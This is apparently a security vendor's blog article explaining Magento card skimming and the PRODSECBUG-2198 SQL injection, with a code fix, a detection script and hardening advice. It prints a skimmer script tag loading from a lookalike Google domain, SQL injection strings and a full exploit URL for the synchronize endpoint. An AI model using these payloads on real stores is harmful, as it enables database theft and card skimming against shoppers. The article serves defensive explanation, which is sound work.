How Does Magento Card Skimming Work & How to be safe?

Magento card skimming is the practice of stealing credit and debit card details by injecting malicious scripts called ‘skimmers’ into a Magento website. If you own a Magento-powered website, this article is for you. Here we collect the details you need about the Magento card skimming security issue.

In this article, we discuss what Magento card skimming is and how it affects Magento websites (with a proof of concept). After that, we cover practical steps you can take to protect your website from this issue. So, let’s jump right in.

Related article – What Are Magecart Attacks On Magento Store And How To Prevent Them

What is Magento card skimming?

Magento is a PHP-based open-source e-commerce platform. It is a self-hosted content management system currently owned by Adobe. Approximately 250,000+ websites use Magento to power their e-commerce operations, and the majority of these belong to US-based e-commerce businesses. Magento therefore carries a heavy responsibility for securing the customer experience.

Card skimming, on the other hand, is the practice of illegally copying information from credit and debit cards using a physical card-skimming device. Here is how Magento and card skimming came to be associated with each other.

Magento card skimming is a form of web skimming in which hackers steal payment information from a Magento store through a third-party script. The script lets them capture crucial banking information such as the cardholder’s name, credit/debit card number, CVV and expiry date. Hackers usually monetize this information by selling it on the black market.

About the PRODSECBUG-2198 Exploit

The PRODSECBUG-2198 issue was first reported on 9 November 2018 on Bugcrowd. PRODSECBUG-2198 is an SQL injection vulnerability in Magento: it allows an unauthenticated user to inject arbitrary SQL, which can leak sensitive information.

The bug was very soon marked as P1. P1 vulnerabilities, according to Bugcrowd, are those which can cause a privilege escalation: any user can elevate from a lower permission level to administrator rights. Beyond that, it allows remote code execution, financial theft, etc. The exploit affected the following versions of Magento:

  • Magento Commerce < 1.14.4.1
  • Magento Open Source < 1.9.4.1
  • Magento < 2.1.17
  • Magento < 2.2.8
  • Magento < 2.3.1

Skimmer by the name of Google

In a very recent case of Magento skimming, we saw hackers using a fake Google domain to steal payment details. In this attack, the malicious JavaScript was being loaded from a domain called google-analytîcs.com (xn--google-analytcs-xpb.com in its Punycode form).

Look carefully and you will see it is a lookalike of the real Google Analytics domain: the accented ‘î’ makes it an IDN homograph of google-analytics.com. This skimming attack thus uses phishing-style deception to fetch sensitive payment information. The injected script looks something like this:

<script type="text/javascript" src="//google-analytîcs.com/www.[redacted].com/3f5cf4657d5d9.js"></script>

The skimmer captures data using the loaded JavaScript and document.getElementsByTagName. If no developer tools are open, it transmits the stolen data to the fake Google domain google-analytîcs.com (xn--google-analytcs-xpb.com).

However, it behaves strangely when the browser’s developer tools are open on your website: it detects them and stops the transmission midway. This behaviour also varies depending on the browser being used.


Magento Card Skimming: Proof of Concept

A proof of concept for this security vulnerability is described below. It is written in Python and exercises the SQL injection at the root of the Magento card skimming issue.

  • The code first creates a dummy browser session with some random URLs and session data. This is done using a Browser class and a session-acquiring function.
  • An object of Browser class with session details is passed to SQL injection class.
  • The SQL injection now adds some payload data to the session URL, creates a product and then fetches crucial details from the website’s database. The SQL injection payload can also be modified to gain privileged access to the backend data.
  • The attacker gains information about the user’s recent transactions and banking information.
[Screenshots: the proof-of-concept Python script]

Is your Magento website hacked? Drop us a message or chat with an Astra agent and, we will be happy to help 😊 Or skip all that and avail the immediate malware cleanup now!

How does the exploit infect your Magento website?

Magento has a huge codebase of approximately 2 million lines of PHP, which makes auditing it for the exploit a cumbersome task. When our team of ethical hackers reviewed the code, they narrowed their search to the code responsible for the ORM and database management.

The bugs behind Magento card skimming were found in two places:

1. In the prepareSqlCondition function

This public function is contained inside one of the main classes handling the database and can be located at

Magento\Framework\DB\Adapter\Pdo\Mysql

The function code is as follows:

[Screenshot: prepareSqlCondition() source with the relevant lines marked]

Understanding the exploit

Let us now understand how the exploit works by focusing on the marked lines. In the line marked [1], a condition alias is associated with a pattern via $conditionKeyMap. Every ‘?’ character inside the pattern is then replaced with a quoted version of the given value by the _prepareQuotedSqlCondition() function on line 33, following the logic written in lines 30-35. Consider the following code instance:

<?php
$db->prepareSqlCondition('username', ['regexp' => 'my_value']);
// $conditionKeyMap['regexp'] = "{{fieldName}} REGEXP ?";
// $query = "username REGEXP 'my_value'";

A problem arises when the “from” and “to” conditions are used together, on line 30. The logic there ensures that a field lies within a range. For a better understanding, look at this code snippet:

<?php
$db->prepareSqlCondition('price', [
    'from' => '100',
    'to' => '1000'
]);
// $query = "price >= '100' AND price <= '1000'";

Whenever both conditions exist, “from” is handled first and then “to”. But a crucial mistake is made on line 38: the query already generated for “from” is reused as the template that is formatted for “to”.

Since every “?” in that template is replaced by the given value, a question mark inside the value for “from” gets replaced by a quoted version of the value assigned to “to”. To perform a working SQL injection, the attacker can use the following exploit code:

<?php
$db->prepareSqlCondition('price', [
    'from' => 'x?',
    'to' => ' OR 1=1 -- -'
]);
// $query = "price >= 'x' OR 1=1 -- -'' AND price <= ' OR 1=1 -- -'"

The mistake, despite being tiny, can be very impactful. The astonishing fact is that this piece of code has been present since Magento version 1.x.
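To make the double substitution concrete, here is an added Python model of the “from”/“to” path described above; it is not Magento’s own code, and its quote() is a simplified stand-in for PDO quoting. The vulnerable builder reuses the quoted “from” clause as the template for “to”, while the fixed builder quotes each clause separately before concatenating.

```python
# Added example, not Magento's own code: a Python model of the from/to path of
# prepareSqlCondition(), contrasting the vulnerable composition with the fixed
# one. quote() is a simplification of PDO quoting (backslash-escapes quotes).

def quote(value: str) -> str:
    """Return value as a single-quoted SQL string literal."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"

def quote_into(text: str, value: str) -> str:
    """Model of Zend's quoteInto(): every '?' in text becomes the quoted value."""
    return text.replace("?", quote(value))

def prepare_quoted_sql_condition(text: str, value: str, field: str) -> str:
    """Model of _prepareQuotedSqlCondition(): bind {{fieldName}}, then the value."""
    return quote_into(text.replace("{{fieldName}}", field), value)

CONDITION_KEY_MAP = {"from": "{{fieldName}} >= ?", "to": "{{fieldName}} <= ?"}

def range_condition_vulnerable(field: str, cond: dict) -> str:
    """Pre-fix logic: the finished 'from' SQL (already holding user data) is
    glued to the 'to' template and the whole string is quoted again."""
    query = ""
    if "from" in cond:
        query = prepare_quoted_sql_condition(CONDITION_KEY_MAP["from"], cond["from"], field)
    if "to" in cond:
        query += " AND " if query else ""
        # BUG: a '?' inside the quoted 'from' value is treated as a placeholder here
        query = prepare_quoted_sql_condition(query + CONDITION_KEY_MAP["to"], cond["to"], field)
    return query

def range_condition_fixed(field: str, cond: dict) -> str:
    """Fixed logic: quote the 'to' clause on its own, then concatenate."""
    query = ""
    if "from" in cond:
        query = prepare_quoted_sql_condition(CONDITION_KEY_MAP["from"], cond["from"], field)
    if "to" in cond:
        query += " AND " if query else ""
        query = query + prepare_quoted_sql_condition(CONDITION_KEY_MAP["to"], cond["to"], field)
    return query

# Constructed input with the same shape as the request URL shown later in the article
PAYLOAD = {"from": "?", "to": "))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE 1=1) -- -"}
BENIGN = {"from": "100", "to": "1000"}

if __name__ == "__main__":
    for build in (range_condition_vulnerable, range_condition_fixed):
        print(build.__name__, "->", build("product_id", PAYLOAD))
```

For the benign range both builders produce the same SQL; only a “from” value containing “?” separates them.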


2. In the execute function of the Synchronize class

Another vulnerability was found in the execute function at the following location:

Magento\Catalog\Controller\Product\Frontend\Action\Synchronize

The PHP source code where the security issue was revealed is as follows:

<?php
public function execute()
{
    $resultJson = $this->jsonFactory->create();
    try {
        $productsData = $this->getRequest()->getParam('ids', []);
        $typeId = $this->getRequest()->getParam('type_id', null);
        $this->synchronizer->syncActions($productsData, $typeId);
    } catch (\Exception $e) {
        $resultJson->setStatusHeader(
            \Zend\Http\Response::STATUS_CODE_400,
            \Zend\Http\AbstractMessage::VERSION_11,
            'Bad Request'
        );
    }
    return $resultJson->setData([]);
}

The call stack that eventually leads to the bug:

<?php
$productsData = $this->getRequest()->getParam('ids', []);
$this->synchronizer->syncActions($productsData, $typeId);
$collection->addFieldToFilter('product_id', $this->getProductIdsByActions($productsData));
$this->_translateCondition($field, $condition);
$this->_getConditionSql($this->getConnection()->quoteIdentifier($field), $condition);
$this->getConnection()->prepareSqlCondition($fieldName, $condition);

This vulnerable code has existed since Magento v2.2.0. A sample URL that triggers this unauthenticated blind SQL injection associated with Magento card skimming is as follows:

https://magento2website.com/catalog/product_frontend_action/synchronize?
type_id=recently_products&
ids[0][added_at]=&
ids[0][product_id][from]=?&
ids[0][product_id][to]=))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE 1=1) -- -

Once information can be read from the database, the attacker can extract the administrator account’s credentials and use them to access the backend. They may also exfiltrate banking and other financial details from the user and transaction databases, and use this information for cybercrimes such as e-commerce fraud, phishing or even vishing.

The attacker may also host malware on your website, which damages your organization’s reputation as an e-commerce platform. Your website may get blacklisted by search engines, causing a fall in organic traffic.
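On the detection side, the request shape above is easy to recognise in web-server logs. The following added Python scanner (not part of the original article) flags Combined Log Format lines that hit the synchronize endpoint with a “?” inside an ids[…][product_id][from] parameter; the log lines are constructed for the example.

```python
# Added detection example, not part of the original article: scan web-server
# access-log lines (Combined Log Format) for requests matching the
# PRODSECBUG-2198 shape described above: the product_frontend_action/synchronize
# endpoint with a '?' inside an ids[...][product_id][from] parameter.
# The log lines below are constructed for this example.
import re
from urllib.parse import parse_qsl, urlsplit

SYNC_PATH = "/catalog/product_frontend_action/synchronize"
FROM_KEY = re.compile(r"^ids\[[^\]]*\]\[product_id\]\[from\]$")
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*"')

def is_prodsecbug_2198_probe(target: str) -> bool:
    """True when the request target hits the synchronize endpoint and carries
    a '?' in a product_id[from] value; False for ordinary traffic."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != SYNC_PATH:
        return False
    # parse_qsl percent-decodes keys and values, so %5B/%5D and %3F are handled
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if FROM_KEY.match(key) and "?" in value:
            return True
    return False

def scan_log(text: str) -> list:
    """Return the client IPs of log lines that look like a PRODSECBUG-2198 probe."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m and is_prodsecbug_2198_probe(m.group(3)):
            hits.append(m.group(1))
    return hits

SAMPLE_LOG = """\
203.0.113.5 - - [28/Mar/2019:14:02:11 +0000] "GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids%5B0%5D%5Badded_at%5D=&ids%5B0%5D%5Bproduct_id%5D%5Bfrom%5D=%3F&ids%5B0%5D%5Bproduct_id%5D%5Bto%5D=%29%29%29+OR+%28SELECT+1%29+--+- HTTP/1.1" 200 2
198.51.100.7 - - [28/Mar/2019:14:03:40 +0000] "GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=1553781820&ids[0][product_id]=42 HTTP/1.1" 200 2
198.51.100.9 - - [28/Mar/2019:14:04:02 +0000] "GET /catalogsearch/result/?q=why%3F HTTP/1.1" 200 8123
"""

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```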

How to protect your website from Magento Card Skimming?

Now that we have understood in detail how Magento card skimming works, let us look at how you can protect your website from such attacks in the future.

  1. Fixing the prepareSqlCondition Function

    To remove the security bug in the prepareSqlCondition function, the “to” branch must be written as:
    $query = $query . $this->_prepareQuotedSqlCondition($conditionKeyMap['to'], $to, $fieldName);
    With this change the “to” clause is quoted on its own and only then appended to the already-built “from” clause. The quoted “from” value is never run through placeholder substitution a second time, so a ‘?’ inside user-supplied data no longer becomes an injection point.

  2. Validation of Input Data

    Every value accepted as input on any page of your Magento-based website must be validated before being passed on for backend processing. Validation should use proper functions or appropriate logic and must be strict. The website administrator should require developers to write secure code.

  3. Update to Stay Secure

    Magento itself and all the plugins used by your Magento-based website must be kept up to date with the latest version. This ensures a secure experience for your customers and users. Hackers usually target websites running old plugins, and they can host malware that slows down your website and gets it blacklisted.

  4. Security Audit

    Do a thorough security audit of the site to make sure you don’t already have security loopholes. Review all Magento users and delete anyone you don’t recognize. To uncover all loopholes and coding vulnerabilities, you can get a professional VAPT (Vulnerability Assessment and Penetration Testing) done on your website.

  5. Report any security discrepancy

    If you find any trace of a security breach in the user database or the database handling transactions, contact the involved parties (the payment processor, the customers and company stakeholders) to sort out the emergency as soon as possible. Security breaches should not be left unattended.

  6. Be cautious about shared hosting security risks

    If your website is on shared hosting, you must purchase plans for backup and increased security. As the security or website administrator, contact your hosting service provider and find out which other websites are hosted on the same shared server. Do not risk your business’s online reputation by going for the cheapest option. A detailed discussion of shared hosting security risks is available in a previous article on the Astra blog.

  7. Data Encryption

    Encrypt the data that is being stored on your website database with a strong encryption mechanism. This will give a tough time to the attacker to break into the personal data of your users or your organization’s strategic information.

  8. Fix XSS attack paths

    Although XSS is not the subject of this article, Magento’s payment gateway pages are built with PHP-based forms, so it is important that they use the htmlspecialchars() function to prevent $_SERVER["PHP_SELF"] attacks.

  9. Install a firewall

    Installing a web application firewall is another way to enhance your website’s security. Astra’s Firewall is a continuous monitoring system for your website. It identifies and blocks incoming threats 24x7. Moreover, it keeps evolving with each attempted attack and gets better configured for the next.


About The Author

Sourish Das
